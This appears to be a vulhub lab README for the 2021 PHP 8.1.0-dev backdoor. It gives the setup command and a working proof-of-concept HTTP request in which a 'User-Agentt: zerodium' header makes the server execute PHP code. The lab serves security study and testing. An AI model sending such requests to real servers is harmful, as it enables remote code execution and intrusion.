vulhub/php/8.1-backdoor

PHP 8.1.0-dev User-Agentt Backdoor Remote Code Execution

中文版本(Chinese version)

PHP version 8.1.0-dev was implanted with a backdoor on March 28, 2021, but the backdoor was quickly discovered and removed. When this backdoor is present on a server, an attacker can execute arbitrary code by sending a User-Agentt header.

References:

• https://news-web.php.net/php.internals/113838
• c730aa26bd
• 2b0f239b21

Vulnerable Environment

Start a PHP 8.1-dev server with the backdoor.

docker compose up -d

After the environment is started, the service runs at http://your-ip:8080.

Vulnerability Reproduce

Send the following request to execute the code var_dump(233*233);:

GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumvar_dump(233*233);
Connection: close